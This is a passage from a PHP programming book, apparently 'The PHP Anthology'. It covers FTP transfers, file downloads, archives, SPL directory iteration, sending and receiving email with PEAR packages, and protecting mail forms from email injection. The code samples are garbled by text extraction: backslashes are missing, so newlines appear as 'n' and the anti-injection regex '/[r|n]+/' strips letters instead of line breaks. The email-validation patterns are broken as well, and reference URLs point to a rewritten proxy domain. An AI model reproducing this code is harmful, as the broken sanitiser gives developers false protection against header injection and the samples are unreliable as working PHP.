      PEAR::NET_FTP is a handy class that ensures data is transferred in the correct mode
      (that is, ASCII or binary), and solves issues relating to recursive uploads and
      downloads where we need to transfer a directory and its subdirectories from one
      system to another.

      This example uses PEAR::NET_FTP to achieve the same outcome as the previous
      example:

                                                                     pearftp.php (excerpt)

       <?php
       set_time_limit(0);
       require_once 'NET/FTP.php';
       $ftpServer = 'localhost';
       $ftpUser   = 'anonymous';
       $ftpPass   = 'user@domain.com';
       $localDir = 'import/';
       $remoteDir = '/';
       $ftp = new Net_FTP();
       $ftp->setHostname($ftpServer);
       $ftp->setUsername($ftpUser);
       $ftp->setPassword($ftpPass);
       $ftp->connect();
       $ftp->login();
       $ftp->getExtensionsFile('extensions.ini');
       if ($ftp->getRecursive($remoteDir, $localDir))
Working with Files     169


 {

   echo 'Files transfered successfully';

 }

 else

 {

   echo 'Transfer failed';

 }

 ?>




Note that the getExtensionsFile method of Net_FTP allows you to specify a file
that defines particular file extensions, such as .gif and .jpg, as binary or ASCII,
ensuring that they will be transferred in the correct manner. The getRecursive
method fetches the contents of the specified remote directory, including its subdir­
ectories.

Assuming you have permission to place files on the server, you can easily apply
the operation in reverse using the putRecursive method. This can be a helpful tool
for transferring whole projects between your local development system and your
web site, particularly if you’re using PHP from the command line.

With the ability to transfer files correctly based on their extension, Net_FTP also
makes an excellent choice for individual put and get file operations, as it eliminates
the need for you to get the file transfer mode correct.

For more information on this PEAR package, see its documentation.15

Discussion
When you connect to a normal FTP server by any means, the username and password
you provide are sent in clear text to the server. This information can easily be read
by malicious parties using a packet sniffer that’s plugged in anywhere between you
and the server you’re connecting to. Be sure to change your passwords regularly
and, in general, try to avoid FTP when a better alternative is available.

If you have SSH access to your site, there are many free SFTP, or SSH File Transfer
Protocol, clients that you can use to interact with it.16

15
   http://pear.php.net/package/Net_FTP/docs/

16
   Wikipedia provides a list of SFTP clients that makes a good starting point for your research, at

http://en.wikipedia.org/wiki/Comparison_of_FTP_clients#Protocol_support.
170   The PHP Anthology


      How do I manage file downloads with PHP?
      A fairly common problem faced by developers building sites that will publish files
      for download is the management of those files. Perhaps some of the files should not
      be publicly available. Perhaps you only want to deliver the file after visitors have
      provided their details through a web form. Dealing with downloads may involve
      more than simply storing your file in a public directory and linking to it from your
      site.

      Solution
      The trick to handling downloads with PHP is to use a few special HTTP headers
      and the readfile function:

                                                                     download.php (excerpt)

       <?php
       $fileName = 'example.ini';
       $mimeType = 'application/zip';
       if (strpos($_SERVER['HTTP_USER_AGENT'], 'MSIE 5') or
           strpos($_SERVER['HTTP_USER_AGENT'], 'Opera 7'))
       {
         $mimeType = 'application/x-download';
       }
       header('Content-Disposition: attachment; filename=' . $fileName);
       header('Content-Type: ' . $mimeType);
       header('Content-Length: ' . filesize($fileName));
       readfile($fileName);
       ?>



      The Content-Disposition header tells the browser to treat the file as a download
      (that is, not to display it in the browser window), and gives it the name of the file.

      The Content-Type header also tells the browser what type of file we’re sending it.
      In most cases, the Content-Type should match the type of file you’re sending;
      however, Internet Explorer 5 and Opera browsers have a bad habit of displaying
      files of recognized types in the browser regardless of the content-disposition
      header, so we set the MIME type to the made-up value application/x-download
      for those browsers.
Working with Files   171

Finally, the content-length header tells the browser the size of the file, so that it’s
able to display a download progress bar.


           Send HTTP Headers First!
         Remember that headers must be delivered before any other content is sent to the
         browser.

         Be aware that PHP’s output control functions can be helpful here,17 as they let
         you send pieces of content to the browser in the correct order: you can hold content
         already sent for output by PHP while letting the headers pass through to the
         browser.


Discussion
There’s no perfect solution to this type of problem. Imagine, for example, that people
decide to make copies of the images they bought from you and redistribute those
copies without your knowing. It’s almost impossible to prevent customers from
doing so unless you provide files that have been modified especially for the purpose
of distribution—with the addition of watermarks, for example.

Though there’s no ideal solution to this problem, it’s important to be aware of some
of the different strategies for file distribution:

■	 Send the file via email. This is a good option for small files, but email systems
   can place a limit on the size of files a user can receive, block certain types of
   files, and operate spam filters that can trap your emails.

■	 Provide customers with a unique link that they can use to download the file for
   a limited time, such as a week. If an attempted download fails (for example, the
   customers lose their Internet connection during the download), this strategy al­
   lows them to try again. A unique, random number can be generated and used in
   the URL for the download. This number corresponds with an entry in a database,
   which expires after a specified time. Such an approach will at least limit the
   number of times the file is downloaded, and should help prevent redistribution
   of the file via the same URL.




17
     http://www.php.net/outcontrol/
172   The PHP Anthology

      ■	 Provide customers with username and password combinations that they can use
         to log in to the site and download their own files. This approach has proven
         particularly effective for SitePoint’s online library, where it’s used to distribute
         SitePoint books in Adobe’s PDF format. The PDF files are secured with the cus­
         tomer’s email address. This obviously discourages customers from redistributing
         the PDF, as it would be obvious which account was used to redistribute the file.

      As I said, there’s no perfect solution to this problem. However, greater protection
      can be achieved if some form of security is built into the file that’s being downloaded,
      such as a password for a document download, a watermark on an image, or a license
      key for a software package.


      How do I create compressed
      ZIP/TAR files with PHP?
      Perhaps you have a directory that contains many files, or different types of files, as
      well as subdirectories. There may well be situations in which you need to create a
      download of the whole directory that preserves its original structure. The typical
      command-line approach to creating such a download on Unix-based systems is first
      to create an “archive” file such as a .tar file (.tar files are “Tape Archives” and
      were originally conceived to help back up a file system onto tape), then compress
      that file with the gzip or bzip2 utilities.

      Solutions
      On a *nix-based system, you’d usually use the tar functionality available through
      the command line to create these files. Using PHP’s system function, you could
      execute these commands from a PHP script, assuming your web server had permis­
      sion to use the tar and gzip or bzip2 executables. However, your server probably
      won’t have these permissions, so in this solution, we chose to use the
      PEAR::Archive_Tar package instead. This package allows you to create archives
      from data stored in your database, or from nodes in an XML document, as well as
      to handle basic files.
Working with Files       173


       Watch Out for E_STRICT Errors
      The PEAR::Archive_Tar package was originally developed with PHP 4. If you
      use it in PHP 5 with E_STRICT errors turned on, you’ll receive E_STRICT errors
      for the deprecated use of references when passing objects.


Compressing Simple Files
In this example, we create an archive file using the Archive_Tar class and add files
to it. Then we do the reverse—extract all the files we added:

                                                                         tar.php (excerpt)

 <?php
 require_once 'Archive/Tar.php' ;
 $tar = new Archive_Tar('demo.tar.gz', 'gz');
 $files = array(
   'example.ini',
   'writeSecureScripts.html'
 );
 $tar->create($files);
 echo 'Archive created';

 $tar2 = new Archive_Tar('demo.tar.gz');
 $tar2->extract('demo');
 echo 'Archive extracted';
 ?>



This code is fairly straightforward. When we’re instantiating the class, the second
argument to the constructor function tells Archive_Tar which type of compression
to use (the alternative to gz, which is used for gzip compression, is bz2, used for
bzip2 compression). Simply omit the second argument if you don’t require compres­
sion. The array of filenames needs to be specified when you use the create method,
keeping the file paths relative to the location at which the script is executed. And
that’s it for file compression!

The process of extraction is actually easier. We call the extract method, and provide
a path (again, one that’s relative to the location of the script) to indicate the location
to which the method should extract the archive—in this case, the subdirectory demo.
It’s nice and easy!
174   The PHP Anthology

      Compressing Database Data
      Archive_Tar is particularly interesting in that it allows strings to be added to the
      archive as files. This hypothetical example demonstrates the archiving of a web
      site’s database of articles—all the articles are retrieved from the database and the
      body text of each article is stored in a text file with a filename that matches the
      article’s ID:

                                                                           tar2.php (excerpt)

       $db = new PDO(DBHOST, DBUSER, DBPASS, DBNAME);
       $tar = new Archive_Tar('demo/articles.tar.gz', 'gz');
       $sql = "SELECT article_id, body FROM articles";
       foreach($db->query($sql) as $row)
       {
         $tar->addString('articles/' . $row['article_id'] . '.txt',
             $row['body']);
       }
       echo 'Article archive created';



      Here, we’ve queried a database using the PDO class available in PHP 5, and used the
      addString method to add to the archive as files some of the data we fetched.

      The first argument represents the path and filename under which the string should
      be stored; the second is the string itself. That should give you a general idea of when
      Archive_Tar can be useful to you.


      How do I work with files using the Standard
      PHP Library in PHP 5?
      With the release of PHP 5, we were given access to the SPL (Standard PHP Library).
      The SPL is a library of classes and interfaces designed to solve a variety of standard
      problems. As you may have guessed, reading directories and getting information
      about the files they contain is one such problem.

      The DirectoryIterator class is part of the SPL and is a convenient way to read
      file directories and retrieve file information. You can also write to the files.

      Additionally, the DirectoryIterator class has an openFile method that creates a
      SplFileObject instance for your manipulatory pleasure! Working with the
Working with Files       175

SplFileObject is outside what we plan to cover in this solution, though, so be sure
to check out the SPL documentation to learn more.18

Solution
In this example, we use the DirectoryIterator class to iterate over a file directory
and discover everything there is to know about the example.ini file:

                                                             dirIterator.php (excerpt)

 <?php
 try
 {
   // handle the various files in the directory like an array
   foreach ( new DirectoryIterator('./') as $Item )
   {
     echo $Item."n";
     // tell me about this one file
     if($Item->getFilename() == 'example.ini')
     {
       echo "tProperties of example.inin";
       echo "tFile name = "   . $Item->getFilename() . "n";
       echo "tPath = "      . $Item->getPath()     . "n";
       echo "tPath name = "   . $Item->getPathname() . "n";
       echo "tPermission = " . $Item->getPerms()     . "n";
       echo "tInod = "      . $Item->getInode()    . "n";
       echo "tSize = "      . $Item->getSize()     . "n";
       echo "tOwner = "     . $Item->getOwner()    . "n";
       echo "tGroup = "     . $Item->getGroup()    . "n";
       echo "tAtime = "     . $Item->getATime()    . "n";
       echo "tMtime = "     . $Item->getMTime()    . "n";
       echo "tCTime = "     . $Item->getCTime()    . "n";
       echo "tType = "      . $Item->getType()     . "n";
       echo "tWritable = "    . $Item->isWritable()    . "n";
       echo "tReadable = "    . $Item->isReadable()    . "n";
       echo "tExecutable = " . $Item->isExecutable() . "n";
       echo "tIs file = "     . $Item->isFile()      . "n";
       echo "tIs directory = " . $Item->isDir()      . "n";
       echo "tIs link = "     . $Item->isLink()      . "n";
       echo "tIs dot = "    . $Item->isDot()    . "n";
       echo "tTo string = "   . $Item->__toString()    . "n";
       echo '------------------------------------------------'."n";



18
     http://www.php.net/~helly/php/ext/spl/
176   The PHP Anthology


             echo "tFile contents = n";

             readfile($Item->getPathName());

             echo '------------------------------------------------'."n"; 

           }

         }

         echo "nnAll the class methodsn";

         // give me all the methods available to the Directory Iterator

         foreach( get_class_methods('DirectoryIterator') as $methodName)

         {

           echo $methodName."n";

         }

       }

       catch(Exception $e){

         // handle my exception

         echo 'No files Found! Message returned: '.$e->getMessage()."n";

       }

       ?>




      Discussion
      We started the code with a simple try {…} catch {…} block to handle any excep­
      tions that might occur while we’re working on the directory.19

      Next, we meet the DirectoryIterator constructor in a foreach loop. The
                                                                                   20
      DirectoryIterator is an implementation of the Iterator design pattern. For a
      class to implement the Iterator design pattern, it must provide a way to access the
      elements of the instantiated object in a sequential way. The DirectoryIterator
      object can be handled like an array and like an object. So we can put it in the foreach
      loop to iterate over the various files in the path provided to the constructor, which
      is similar to what we did earlier in the section called “How do I examine directories
      with PHP?”

      We then chose a file (example.ini) and looked at all its properties using the file object’s
      methods—and obtained much the same information we obtained earlier in “How
      do I examine directories with PHP?” but without all the if statements!


      19
           Exceptions are generally considered to be the better, object oriented way of handling errors, and are
      seen as preferable to the if block statements we saw earlier.
      20
        If you don’t know what a design pattern is yet, don’t worry! Plenty of information is available on the
      Web, for example, at Wikipedia: http://en.wikipedia.org/wiki/Iterator_pattern. The PHP Manual also
      has an entry on iteration at http://www.php.net/manual/en/language.oop5.iterations.php.
Working with Files      177

Last of all, we wanted to access a full listing of the DirectoryIterator object’s
methods. We used the get_class_methods function in another foreach loop to
echo those methods out for us.

If you want more information on DirectoryIterator, first look at the SPL docu­
mentation and all the method pages,21 paying particular attention to the user com­
ments. You can also review the SPL documentation with UML (Unified Modeling
Language) diagrams,22 which will give you the opportunity to see what else is
available in the SPL.


Summary
As you can see, working with files isn’t that hard! Actually, it’s fairly easy once you
know what to use and how to use it. Plenty of file-related tools are available in the
form of PHP’s built-in file system and streams functionality, numerous PEAR
packages, and the PHP 5 Standard PHP Library (SPL). Each offers something to
make your life easier—just don’t let your boss know how easy it really is!




21
     http://www.php.net/spl/
22
     http://www.php.net/~helly/php/ext/spl/
The PHP Anthology
7
                                                  Chapter




Email
Building online applications isn’t just about delivering pages to web browsers—such
applications often involve email functionality as well. Email is used for a variety
of tasks within a web application, including the mailing of regular newsletters as a
means to stay in touch with visitors, and the provision of automated notifications
for user registration systems.

Once you know how to create email efficiently in PHP, it’s much easier to add email
functionality to your web site, and to communicate with your site’s visitors.


How do I send a simple email?
So you need to send a simple text email. It’s nothing fancy—just a brief text message
to pass on some information. Let’s see how it’s done.

Solutions
Two simple approaches are available. The first uses PHP’s built-in mail function,
while the second relies on the PEAR::Mail package.
180   The PHP Anthology

      Using the PHP mail Function
      Sending simple emails is easy with PHP’s mail function.1 You need only one line
      of code to send a message—what could be easier? Here’s how it works:

                                                                            phpMail.php

          <?php
          mail('you@yourdomain.com', 'Howdy', 'Glad to meet you.',
              'From: me@mydomain.com');
          ?>



      The arguments supplied to the mail function above contain the following informa­
      tion, in the order supplied here:

      ■ the address to which we’re sending the email
      ■ the subject of the email
      ■ the body of the email

      The last argument represents any extra header information you’d like to include in
      the email. In the example above, we’ve added a from header to set on the email the
      address from which the message was sent.

      Using the PEAR::Mail Package
      In this example, we’re sending the same email using the PEAR::Mail package:

                                                                   pearMail.php (excerpt)

          <?php
          error_reporting(E_ALL);
          require 'Mail.php';
          $mail = Mail::factory('mail');
          $headers = array(
              'From'    => 'me@mydomain.com',
              'Subject' => 'Howdy'
          );
          $succ = $mail->send('you@yourdomain.com', $headers,
              'Glad to meet you.');
          if (PEAR::isError($succ))



      1
          http://www.php.net/manual/en/function.mail.php
Email   181


 {

   echo 'Email sending failed: ' . $succ->getMessage();

 }

 else

 {

   echo 'Email sent succesfully';

 }

 ?>




Let’s ignore the first line for a minute, and look instead at the second line, where
we include the PEAR::Mail package. Next, we use the static Mail::factory method
to instantiate a Mail object that can send email for us. We supply the argument
'mail' to the factory method to indicate that we wish to use PHP’s built-in mail
function. We then create an array for the header values we wish to include in our
email, and finally call the Mail->send method, supplying the recipient’s email ad­
dress, our array of headers, and the body text of the email.

The Mail->send method will return true if successful, and a PEAR_Error object if
it’s unsuccessful. We can test for the presence of an error using the PEAR::IsError
method and act accordingly.


       Watch Out for E_STRICT Errors
      The PEAR::Mail package was originally developed with PHP 4. If you use it in
      PHP 5 with E_STRICT errors turned on, you’ll receive E_STRICT errors. In our
      example above, and in others further on, we use the error_reporting function
      to set the level of reported errors to E_ALL, preventing E_STRICT errors from ap­
      pearing in PHP 5.


Discussion
The mail function can integrate with the local sendmail client (an email application
widely used on Unix-based systems), or with a remote SMTP (Simple Mail Transfer
Protocol) server if you lack a sendmail-compatible client. Your web host should be
able to supply the relevant SMTP server details for use in your script. However, if
you’re using Windows for your development environment, you’ll need to tell PHP
which SMTP server it should use to send mail by modifying the following settings
in php.ini:
182   The PHP Anthology


          [mail function]

          ; For Win32 only.

          SMTP = smtp.yourdomain.com

          smtp_port = 25

          sendmail_from = you@yourdomain.com



      Here, we’ve set the SMTP setting to the domain name of the SMTP server, which, in
      the vast majority of cases, will be the SMTP server provided by your ISP. We’ve
      also set the smtp_port setting to the appropriate server port number (the default is
      25). The sendmail_from setting represents the sending address for your emails.

      Most of the emails you’ll want to send are probably not as simple as those we’ve
      been dealing with here. Even if you wanted to keep your emails simple and use
      only plain text, things could start to get a little complex as you started adding extra
      headers, composing longer messages, and including attachments.

      The second solution presented here uses more code than the first, which used only
      one line of PHP, but in exchange for the extra code we get a lot more flexibility, and
      we’ll find the system easier to use when we create more complex emails. For that
      reason, the remaining examples will use the various classes available from the PEAR
      package.


      How do I simplify the generation
      of complex emails?
      Using the mail function is fine for simple messages, but its limitations become ap­
      parent when you attempt to create more complex emails. For instance, you might
      decide you want to have your own email address appearing in the From field of a
      message, to add people’s names alongside their addresses, to carbon copy (CC) email
      to a number of recipients, or to send your emails to a different SMTP server. In any
      of these cases, you’ll need something more than mail to get the job done.

      Enter: the PEAR::Mail and PEAR::Mail_Mime classes.2 These classes give the mail
      function a raft of extra functionality, such as the ability to include attachments,
      create HTML and mixed-format emails, bypass the mail function completely, and


      2
        See the Mail package documentation at http://pear.php.net/manual/en/package.mail.mail.php, and
      the Mail_Mime documentation at http://pear.php.net/manual/en/package.mail.mail-mime.php.
Email     183

connect to an SMTP server directly. These classes also provide an API that makes
the construction of more complex emails very easy.

Solution
This code uses a specified SMTP server to send email:

                                                                     pearMailSMTP.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require 'Mail.php';
    $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));
    $hdrs = array(
        'From'    => 'Me <me@mydomain.com>',
        'CC'    => 'Mr Example <example@exampledomain.com>',
        'Subject' => 'Howdy'
    );
    $body = 'Glad to meet you.';
    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
    if (PEAR::isError($succ))
    {
      echo 'Email sending failed: ' . $succ->getMessage();
    }
    else
    {
      echo 'Email sent succesfully';
    }
    ?>



Discussion
Thanks to the PEAR::Mail class, we’re no longer limited to using PHP’s mail config­
uration, so we can set up mail as we choose. The Mail::factory method accepts
parameters for the type of mail system you want to use, and for any options you
want to specify for your back-end setup.3 Mail::factory accepts one of the follow­
ing:




3
 See http://pear.php.net/manual/en/package.mail.mail.factory.php for more information on the options
available for back-end mail systems.
184   The PHP Anthology

      mail        uses the configured PHP mail settings

      sendmail    allows you to control which sendmail program is used, and which
                  options are sent to it

      smtp        contacts an SMTP server to send the mail for you

      When we work with multipart emails—for example, emails that include text and
      HTML parts—we’ll use the PEAR::Mail_Mime class instead. It inherits from the
      PEAR::Mail class but provides a number of additional features to the API to make
      our lives much easier.


      How do I add attachments to messages?
      Sending an attachment with your email is incredibly easy with the PEAR::Mail_Mime
      class.

      Solution
      Take a look at this code, which shows the Mail_Mime->addAttachment method in
      action:

                                                                attachment.php (excerpt)

       <?php
       error_reporting(E_ALL);
       require 'Mail.php';
       require 'Mail/mime.php';
       $mime = new Mail_Mime("rn");
       $mime->setTXTBody('See attached text file.');
       $mime->addAttachment(
           'test.txt',
           'text/plain',
           'attached.txt',
           TRUE,
           'quoted-printable'
       );
       $body = $mime->get();
       $hdrs = $mime->headers(array(
           'From'    => 'me@mydomain.com',
           'Subject' => 'File Attachment'
       ));
       $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));
Email     185


    $succ = $mail->send('you@yourdomain.com', $hdrs, $body);

    if (PEAR::isError($succ))

    {

      echo 'Email sending failed: ' . $succ->getMessage();

    }

    else

    {

      echo 'Email sent succesfully';

    }

    ?>




First, we instantiate a Mail_Mime object, passing the line endings we wish to use
for the email. The text for the body of the email is then set using the Mail_Mime
object’s setTXTBody method, and we add the attachment using the addAttachment
method. Next, we call the get method to build the email’s body, and the header
method to create any special headers we might need. The get method should always
be called before the headers method.

Then, just like the previous examples, we use the Mail::factory method to instan­
tiate our Mail object, and we call the send method to send our email, supplying it
with the body and header parts we built using the Mail_Mime class. This solution’s
simple and powerful—just how we like it!

Discussion
You can transfer more than just text files with the addAttachment method.4 Feel
free to use it for images or application files. Just be sure to specify the correct content
type for the file in the second argument. If you don’t supply any more arguments
to the method, the defaults will be used—and usually, they’re fine. Here’s an ex­
ample:

    $mime->addAttachment('php.gif', 'image/gif');



If the defaults aren’t suitable, you can specify precisely how you want the file to be
attached to the email. The third argument represents the filename you want the at­
tachment to display on the email.


4
    To view the full documentation for the addAttachment method, see
http://pear.php.net/manual/en/package.mail.mail-mime.addattachment.php.
186   The PHP Anthology

      Don’t feel like using a text file? Perhaps you’d rather use a variable containing the
      text that you want to attach? No problem. Place that variable in the first argument,
      and set the fourth to false, like so:

       $txt = 'testing testing - 1, 2, 3';

       $mime->addAttachment(

           $txt, 

           'text/plain', 

           'TestMe.txt', 

           false,

           'quoted-printable'

       );



      The fifth argument represents the transfer encoding. While the default encoding,
      'base64', is fine for most files, for text-based files, you may wish to use 'quoted­
      printable' instead.


             Did you See “Notice” Error Messages?
            At the time of writing, a number of Notice log messages will be thrown from the
            PEAR::Mail_Mime class if you use PHP 5.1.6 for this solution. These notices are
            the result of a change to the PHP internals, for which a bug report has been sub­
            mitted to the PHP development team, but which doesn’t affect the output of the
            script.

            If the Notice messages bother you, turn them off with the error_reporting
            function, but remember that by doing this, you could also very easily hide a
            problem with your script.



      How do I send HTML email?
      Most email clients are capable of understanding HTML that’s placed in the body of
      an email. Using PEAR::Mail_Mime, it’s easy to add HTML to emails, and even to
      embed images within the document. This class will automatically determine
      whether or not you’ve placed HTML in the body of the message and set the MIME
      headers accordingly. You can also add an alternative text version of your email for
      use by recipients whose email clients cannot, or choose not, to display HTML emails.
Email    187


Solution
The code below sends a multipart message—one part is HTML, while the other is
plain text—as well as an image that’s embedded in the HTML with an img tag:

                                                         htmlEmail.php (excerpt)

 <?php
 error_reporting(E_ALL);
 include('Mail.php');
 include('Mail/mime.php');
 $text = "Text version of emailnMessage made with PHP";
 $html = '<html><body>HTML version of email<br />';
 $html .= 'Message made with <img src="12345" /></body></html>';
 $crlf = "n";
 $hdrs = array(
     'From'    => 'me@mydomain.com',
     'Subject' => 'Test HTMl Email with Embedded Image'
 );
 $mime = new Mail_mime($crlf);
 $mime->setTXTBody($text);
 $mime->addHTMLImage('php.gif', 'image/gif', '12345', true);
 $mime->setHTMLBody($html);
 $body = $mime->get();
 $hdrs = $mime->headers($hdrs);

 $mail = Mail::factory('mail');
 $succ = $mail->send('you@yourdomain.com', $hdrs, $body);
 if (PEAR::isError($succ))
 {
   echo 'Email sending failed: ' . $succ->getMessage();
 }
 else
 {
   echo 'Email sent succesfully';
 }
 ?>



The output of this code can be seen in Figure 7.1.
188   The PHP Anthology




                                  Figure 7.1. Displaying the multipart message


      How do I mail a message to
      a group of people?
      In many cases, it’s useful to be able to mail a message to more than one person at a
      time—for example, if you’re sending a newsletter, a message to a group mailing list,
      a site update notification to the IT staff, a feature freeze notification to a development
      team, and so on. However, in certain circumstances, sending unsolicited email to
      a group of people can also be called spamming—something I’m sure you won’t be
      doing with PHP!

      If you’re using PEAR::Mail_Mime, you have the option to send group email by adding
      BCC or CC headers to the email message. This approach may not suit your require­
      ments, though—listing all the addresses from an especially large distribution list
      in the header of a single email can quickly overwhelm your email server.

      A better approach is to send each email individually, reusing the same instance of
      the PEAR::Mail_Mime class for each new message.
Email   189


Solution
In this hypothetical example, we’ll retrieve a list of names and email addresses from
a discussion forum’s member database, and reuse one instance of the
PEAR::Mail_Mime class to send an email to each of those addresses:

                                                                  group.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require 'Mail.php';
 require 'Mail/mime.php';

 /* create the email */

 $mime = new Mail_Mime("rn");
 $mime->addAttachment('php.gif', 'image/gif');
 $header = array(
     'From'    => 'me@mydomain.com',
     'Subject' => 'Forum Newsletter'
 );
 $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.net'));

 /* go to the database to get the member information */

 $dsn = 'mysql:host=localhost;dbname=forum;';
 $user = 'user';
 $password = 'secret';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'SELECT member_email, firstname, lastname FROM member';

   /* cycle through the list sending the custom emails */

   foreach ($dbh->query($sql) as $row)
   {
     $mime->setTXTBody(
         "Howdy {$row['firstname']} {$row['lastname']}");
     $body = $mime->get();
     $hdrs = $mime->headers( $header);
     $succ = $mail->send($row['member_email'], $hdrs, $body);
     if (PEAR::isError($succ))
190   The PHP Anthology


           {

             error_log("Email not sent to {$row['member_email']}: " .

                $succ->getMessage());

           }

         }

       } 

       catch (PDOException $e)

       {

         echo 'PDO Exception Caught. ';

         echo 'Error with the database: <br />';

         echo 'SQL Query: ', $sql;

         echo 'Error: ' . $e->getMessage();

       }

       ?>




      In the above example, we instantiate the PEAR::Mime_Mail object and set up the
      message and its sender. We then go to our hypothetical member database and retrieve
      each member’s email address, first name, and last name. Then, using that result set,
      we add a custom welcome message to the email, build the message, set the headers,
      and send the email to that user’s email address.

      Discussion
      For very large distribution lists, a simple foreach loop won’t quite cut it—you’ll
      risk flooding your mail server with messages! Instead, you’ll need to devise a means
      of sending the messages at a rate that your server can handle. The simplest way to
      achieve this is to use the PHP sleep function to pause your script every ten messages
      or so. You’ll also need to use the set_time_limit function to allow your script to
      run for more than the default thirty-second limit.

      Lastly, don’t forget to contact your hosting service to see if they have set any limit­
      ations or restrictions to which you must adhere. Some hosting services place a strict
      limit on the number of emails that can be sent per hour, in an effort to protect
      themselves from being seen as spammers.


             Complying with Anti-spam Legislation
            In the United States (at the state and federal level), laws have been passed regarding
            unsolicited emails and spam. The USA has the federal CAN_SPAM law of 2003
            as well as numerous individual state laws, and these may affect what you include
Email   191

        in, and how you send, your emails. The USA is not the only country to pass such
        laws, of course—countries in the European Union, Asia, South America, and so
        on around the globe have also put anti-spam legislation in place. For more inform­
        ation, visit the Spam Laws web site (though it is not a definitive listing),5 and see
        your local government web site.



How do I handle incoming mail with PHP?
You’ve already seen that sending mail with PHP is no problem. But what about
dealing with incoming mail using PHP? If your site is hosted on a Linux system,
you’ll be happy to hear that with a little tuning, it’s easy to have PHP to examine
incoming email.

Solution
In this solution, I’ll assume that you have your site hosted on a Linux-based system,
that you have command prompt access to the server and are able to run PHP from
the command prompt, and that you’re using sendmail to handle email on the server.
Phew! It’s a long list of requirements, I know, but this fairly common configuration
greatly simplifies matters.

First things first: you need to place a file called .forward in your home directory.
Use a text editor to write the following to the file (all on one line):

    you@yoursite.com "|/home/yourUserName/mailhandler.php"



Now, within the PHP script mailhandler.php, you can process incoming email for
the you@yoursite.com email address in any way you like. Here’s an example script
that detects incoming email from a particular address and sends a second notification
email in response:

                                                                      mailhandler.php (excerpt)

    #!/usr/bin/php
    <?php
    // Read the email from the stdin file
    $fp = fopen('php://stdin', 'r');
    $email = fread ($fp, filesize('php://stdin'));


5
    http://www.spamlaws.com/
192   The PHP Anthology


          fclose($fp);

          // Break the email up by linefeeds

          $email = explode("n", $email);

          // Initialize vars

          $numLines = count($email);

          for ($i = 0; $i < $numLines; $i++) {

            // Watch out for the From header

            if (preg_match("/^From: (.*)/", $email[$i], $matches)) {

              $from = $matches[1];

              break;

            }

          }

          // Forward the message to the hotline email

          if (strstr($from, 'vip@example.com')) {

            mail('you@yourdomain.com', 'Urgent Message!',

                 'Check your mail!');

          }

          ?>




      Discussion
      The .forward file tells the mail system on the server that any email that’s headed for
      you@yoursite.com not only needs to be delivered to that address, but must also be
      sent to the PHP script at /home/yourUserName/mailhandler.php.

      The PHP script that’s given in this solution is intended to be run automatically by
      the mail system—not by your web server. The first line of the file must point to the
      location of the standalone PHP program on your server (commonly /usr/bin/php)
      and is known as the shebang. After that, the code fetches the email from standard
      input and manipulates it.

      There are a number of ways in which you can manipulate an inbound email. First
      of all, you have the simple string functions we used above, which are built into
      PHP. The IMAP extension and the MailParse extension are also available. And in
      PEAR, you can use the Mail_Mime package (Mail_mimeDecode, to be specific) as
      well.6




      6
          For an example of Mail_mimeDecode in action, see
      http://pear.php.net/manual/en/package.mail.mail-mimedecode.example.php.
Email   193


           A Solution Looking for a Problem?
         The value that being able to handle incoming emails with PHP provides may not
         be obvious at first. But if you’ve ever read the SitePoint “TechTimes,”7 you know
         the answer—whether you realize it or not! The actions of subscribing to, and un­
         subscribing from, that mailing list are handled by PHP. You could also use PHP
         to build spam filters, to allow users to submit updates to the versioning system
         of your application via emails sent to a special address (with proper authentication
         of course), and to create a whole host of other applications.



How can I protect my site
against email injection attacks?
An email injection attack occurs when a cracker uses your web site’s email form
to send email in a way you never intended—either by spoofing your form, or using
a script to fill out the form and submit it. A few nastier examples of this sort of be­
havior include sending spam through your form, mailing mass email using your
bandwidth, or sending emails that pretend to be from you in a phishing attempt.
These kinds of attacks can have consequences—they may as simple as receiving a
warning from your hosting provider, or as problematic as paying higher costs for
bandwidth, suffering the revocation of your email privileges by the hosting company,
or being blacklisted as a known spammer.

By using PHP’s mail function to handle your site’s mail form, you open yourself to
the possibility of an email injection attack not because of a fault in the PHP mail
function, but because of the MIME and SMTP standards. Without getting into the
details of those standards, you should know that all it takes for a cracker to gain
control of your email form is for them to be able to add to or manipulate the mes­
sage’s original header. A craftily added new line character or additional header line
is all it takes.

Luckily, when you get right down to it, basic protection from an email injection
attack is incredibly simple to implement: do not allow new lines in the user input
that’s used in email headers. Despite the ease with which attacks are avoided using
this technique, many developers fail to implement it.


7
    http://www.sitepoint.com/newsletter/
194   The PHP Anthology


            Diving into the Details
           If you need more details on the SMTP and MIME protocols, search the Web for
           light-weight information, or go straight to the source by reading the relevant RFC’s
           (Request for Comments) at the Internet Engineering Task Force web site.

           For information on SMTP, see:

           ■ http://www.ietf.org/rfc/rfc0821.txt

           And for information on the MIME protocol, visit:

           ■ http://www.ietf.org/rfc/rfc2045.txt
           ■ http://www.ietf.org/rfc/rfc2046.txt
           ■ http://www.ietf.org/rfc/rfc2047.txt
           ■ http://www.ietf.org/rfc/rfc2048.txt
           ■ http://www.ietf.org/rfc/rfc2049.txt



      Solution
      Here’s an example that shows how to remove new lines from user input:

                                                                              attack.php (excerpt)

       <?php
       $error = FALSE;
       if (isset($_POST['submit']))
       {
         $to = 'me@mydomain.com';
         // replace new lines with a space
         // prevents a user from adding headers
         $subject = preg_replace('/[r|n]+/', " ", $_POST['subject']);
         $from = preg_replace('/[r|n]+/', " ", $_POST['from']);

         // basic validation for subject and email address
         $emailPattern = '/^[w-.]+@([w-]+.)+[w-]{2,4}$/';
         if (preg_match('/^[^w .!?*%$#]+$/', $subject) ||
           !preg_match($emailPattern, $from))
         {
           $error = "Invalid input. Try again.";
         }

